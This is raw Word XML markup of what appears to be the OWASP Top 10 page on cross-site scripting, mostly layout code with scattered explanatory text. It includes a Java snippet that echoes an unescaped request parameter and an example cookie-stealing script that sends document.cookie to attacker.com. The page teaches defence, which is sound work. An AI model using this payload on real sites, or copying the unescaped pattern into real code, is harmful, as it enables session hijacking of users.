                          </w:rPr>
                          <w:t>Reflec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3)</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6DA4069F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
                          <w:ind w:left="73"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId231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A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                              <w:u w:val="none"/>
                            </w:rPr>
                            <w:t>DOM</w:t>
                          </w:r>
                        </w:hyperlink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hyperlink r:id="rId232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A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                              <w:u w:val="none"/>
                            </w:rPr>
                            <w:t>based</w:t>
                          </w:r>
                        </w:hyperlink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hyperlink r:id="rId233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A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                              <w:u w:val="none"/>
                            </w:rPr>
                            <w:t>XSS</w:t>
                          </w:r>
                        </w:hyperlink>
                        <w:hyperlink r:id="rId234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23232"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                              <w:u w:val="none"/>
                            </w:rPr>
                            <w:t>.</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                      <w:p w14:paraId="489EF4A0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="32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X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air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sy</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="151B8980" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="201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s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d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alysi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C76B223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</w:p>
                      <w:p w14:paraId="509CE339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ecu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crip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2DC5DAE0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’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1A6A7CB3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ijac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ssions,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="023E90C9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fac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tes,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3545138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ser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ostile</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="360A4DAD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ten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direct</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4452C27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ijac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35FAEFD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’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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="76CF4C03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lware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tc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9A4118B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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7641BE1C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5327365A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ffec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</w:p>
                      <w:p w14:paraId="225CF00A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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="62718533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cesses.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="380FE000" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="31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54113E1C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a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34889768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ublic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osu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77254572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ulnerability.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="78D9FC54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2681A255">
          <v:shape id="imagerId235" o:spid="_x0000_s2664" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251933184;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId235" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="563D6375">
          <v:shape id="imagerId236" o:spid="_x0000_s2663" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251932160;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId236" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0C1D56E9">
          <v:shape id="imagerId237" o:spid="_x0000_s2662" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251931136;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId237" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5C9BEAE1">
          <v:shape id="imagerId238" o:spid="_x0000_s2661" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251926016;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId238" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="648EA974">
          <v:shape id="imagerId239" o:spid="_x0000_s2660" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251924992;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId239" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5007C0AC">
          <v:shape id="imagerId240" o:spid="_x0000_s2659" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251930112;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId240" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="54777826">
          <v:shape id="imagerId241" o:spid="_x0000_s2658" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251929088;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId241" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="064938B4">
          <v:shape id="imagerId242" o:spid="_x0000_s2657" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251928064;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId242" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4210FE46">
          <v:shape id="imagerId243" o:spid="_x0000_s2656" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251927040;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId243" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="20F795B4">
          <v:shapetype id="_x0000_m2655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536DECD">
          <v:shape id="_x0000_s2654" type="#_x0000_m2655" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25195571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350E3218">
          <v:shapetype id="_x0000_m2653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CA49177">
          <v:shape id="_x0000_s2652" type="#_x0000_m2653" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.9pt;width:543pt;height:3pt;z-index:25165158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506D7EC3">
          <v:shapetype id="_x0000_m2651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A4D47C">
          <v:shape id="_x0000_s2650" type="#_x0000_m2651" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:156.35pt;width:543pt;height:3pt;z-index:25165260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5786420">
          <v:shapetype id="_x0000_m2649" coordsize="600,2057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6A5F99D">
          <v:shape id="_x0000_s2648" type="#_x0000_m2649" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:72.3pt;width:6pt;height:205.75pt;z-index:25165363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865DBA6">
          <v:shapetype id="_x0000_m2647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6A81A17">
          <v:shape id="_x0000_s2646" type="#_x0000_m2647" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.8pt;width:543pt;height:3pt;z-index:25165465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9FDB355">
          <v:shapetype id="_x0000_m2645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4D58896">
          <v:shape id="_x0000_s2644" type="#_x0000_m2645" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:273.55pt;width:543pt;height:3pt;z-index:25165568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EE5D1FD">
          <v:shapetype id="_x0000_m2643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B5952C">
          <v:shape id="_x0000_s2642" type="#_x0000_m2643" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25195468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E28B703">
          <v:shapetype id="polygon181" o:spid="_x0000_m2641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B01DC02">
          <v:shape id="WS_polygon181" o:spid="_x0000_s2640" type="#polygon181" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25195366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1622479">
          <v:shapetype id="polygon182" o:spid="_x0000_m2639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D1E1770">
          <v:shape id="WS_polygon182" o:spid="_x0000_s2638" type="#polygon182" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251952640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667609AA">
          <v:shapetype id="polygon205" o:spid="_x0000_m2637" coordsize="78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5DA0C3">
          <v:shape id="WS_polygon205" o:spid="_x0000_s2636" type="#polygon205" style="position:absolute;left:0;text-align:left;margin-left:7.2pt;margin-top:380.15pt;width:78.95pt;height:.6pt;z-index:-25195161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7ED4927">
          <v:shapetype id="polygon219" o:spid="_x0000_m2635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51C6815">
          <v:shape id="WS_polygon219" o:spid="_x0000_s2634" type="#polygon219" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25195059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0DD1E4D8">
          <v:shapetype id="polygon229" o:spid="_x0000_m2633" coordsize="1458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844E592">
          <v:shape id="WS_polygon229" o:spid="_x0000_s2632" type="#polygon229" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:145.8pt;height:.6pt;z-index:-25194956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627E73C">
          <v:shapetype id="polygon234" o:spid="_x0000_m2631" coordsize="1956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DEB06E">
          <v:shape id="WS_polygon234" o:spid="_x0000_s2630" type="#polygon234" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:573.2pt;width:195.6pt;height:.6pt;z-index:-25194854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1233850">
          <v:shapetype id="polygon242" o:spid="_x0000_m2629" coordsize="1396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F34326D">
          <v:shape id="WS_polygon242" o:spid="_x0000_s2628" type="#polygon242" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:588.2pt;width:139.65pt;height:.6pt;z-index:-25194752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07F3F83">
          <v:shapetype id="polygon247" o:spid="_x0000_m2627" coordsize="741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CB45C1C">
          <v:shape id="WS_polygon247" o:spid="_x0000_s2626" type="#polygon247" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:603.2pt;width:74.15pt;height:.6pt;z-index:-2519464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E3E57A4">
          <v:shapetype id="polygon252" o:spid="_x0000_m2625" coordsize="2114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8B514A1">
          <v:shape id="WS_polygon252" o:spid="_x0000_s2624" type="#polygon252" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:618.2pt;width:211.4pt;height:.6pt;z-index:-2519454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5E54D76">
          <v:shapetype id="_x0000_m2623" coordsize="154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8D99411">
          <v:shape id="_x0000_s2622" type="#_x0000_m2623" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:633.2pt;width:154.3pt;height:.6pt;z-index:-2519444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E120EBE">
          <v:shapetype id="_x0000_m2621" coordsize="227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5CC5C33">
          <v:shape id="_x0000_s2620" type="#_x0000_m2621" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:648.2pt;width:227.5pt;height:.6pt;z-index:-2519434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BF9EDD1">
          <v:shapetype id="_x0000_m2619" coordsize="210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E2523DF">
          <v:shape id="_x0000_s2618" type="#_x0000_m2619" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:663.2pt;width:210pt;height:.6pt;z-index:-2519424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1DDFDA6">
          <v:shapetype id="polygon272" o:spid="_x0000_m2617" coordsize="1552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C58A8C3">
          <v:shape id="WS_polygon272" o:spid="_x0000_s2616" type="#polygon272" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:678.2pt;width:155.25pt;height:.6pt;z-index:-2519413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04F2A6B">
          <v:shapetype id="polygon281" o:spid="_x0000_m2615" coordsize="1480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81AFBB9">
          <v:shape id="WS_polygon281" o:spid="_x0000_s2614" type="#polygon281" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:709.2pt;width:148.05pt;height:.55pt;z-index:-25194035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E37D288">
          <v:shapetype id="polygon282" o:spid="_x0000_m2613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948A0A">
          <v:shape id="WS_polygon282" o:spid="_x0000_s2612" type="#polygon282" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25193932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3808B49">
          <v:shapetype id="_x0000_m2611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56C277E">
          <v:shape id="_x0000_s2610" type="#_x0000_m2611" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251938304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7133DA8C">
          <v:shapetype id="polygon298" o:spid="_x0000_m2609" coordsize="1458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D541B87">
          <v:shape id="WS_polygon298" o:spid="_x0000_s2608" type="#polygon298" style="position:absolute;left:0;text-align:left;margin-left:331.55pt;margin-top:376.2pt;width:145.8pt;height:.6pt;z-index:-25193728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EB0EED2">
          <v:shapetype id="polygon308" o:spid="_x0000_m2607" coordsize="752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4C6D3F7">
          <v:shape id="WS_polygon308" o:spid="_x0000_s2606" type="#polygon308" style="position:absolute;left:0;text-align:left;margin-left:298.8pt;margin-top:419.15pt;width:75.2pt;height:.6pt;z-index:-251936256;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#323232" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0ABE973B">
          <v:shapetype id="polygon325" o:spid="_x0000_m2605" coordsize="1116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CBC6682">
          <v:shape id="WS_polygon325" o:spid="_x0000_s2604" type="#polygon325" style="position:absolute;left:0;text-align:left;margin-left:406.05pt;margin-top:472.2pt;width:111.6pt;height:.6pt;z-index:-25193523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2B56C47">
          <v:shapetype id="polygon331" o:spid="_x0000_m2603" coordsize="117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507E4F1">
          <v:shape id="WS_polygon331" o:spid="_x0000_s2602" type="#polygon331" style="position:absolute;left:0;text-align:left;margin-left:336.8pt;margin-top:485.15pt;width:117pt;height:.6pt;z-index:-251934208;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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3</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Cross-Site</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>(XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3AD19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66047E5B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55706703" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542CC4E4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548A40C2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E33BD3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667AF653" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1648C4D7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B43B29" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4E3936" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF591A0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E097A1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A25DE3E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CBD9CC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6F48D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44494E5F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B506130" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AD3DA2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42226FD4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E28FB25" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4537A032" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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XSS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02096B45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su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pplied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64E605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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inpu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per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scaped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you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no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erif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af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ia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD93140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p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alidatio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fo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clud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p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utput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43302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pag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p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utp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scap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alidatio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ch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B2215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p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e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ti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t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r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jax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30775845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ynamic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pd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ing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D822455" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:hyperlink r:id="rId244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safe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245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JavaScript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246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PIs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?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8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>For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8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unsafe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8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>JavaScript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8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>APIs,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8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>encoding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8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8C5D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valid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u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d.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AB7C7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utom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ol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m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X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blem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ically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B90BA1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However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a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uil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utp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fferently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100247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ffer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terpret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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8492C5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JavaScript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tiveX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sh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lverlight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k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ed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF74B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ete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fficult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refor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le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vera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</w:p>
    <w:p w14:paraId="702D98EC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mbin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nua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vie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enetr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esting,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20508D19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ddi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roaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41B932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Web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2.0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echnologi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jax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k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X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u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re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A8715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ifficul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t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i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ols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD1B41" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199B5260" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="470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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3E478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trus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stru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6E50C740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ollow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TM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nippe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alid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scaping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8E59A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(String)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page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&lt;input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name='creditcard'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type='TEXT‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D0876" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89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value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request.getParameter("CC")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"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&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A3D3A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dif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‘CC’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amet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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315BDA46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&gt;&lt;script&gt;document.location=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD1812E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89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http://www.attacker.com/cgi-bin/cookie.cgi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F557BB5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89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foo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+document.cookie&lt;/script&gt;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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7798DC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>This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causes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he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victim’s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session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ID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o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be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sent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o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he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attacker’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602FFC0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websit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ow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ija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urrent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5472E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ession.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E87BFE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No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X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fe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</w:p>
    <w:p w14:paraId="12E96F4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utom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SR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fen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igh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mploy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e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FC760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8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f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SRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15705EA8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12EC1007" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052F8A7A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
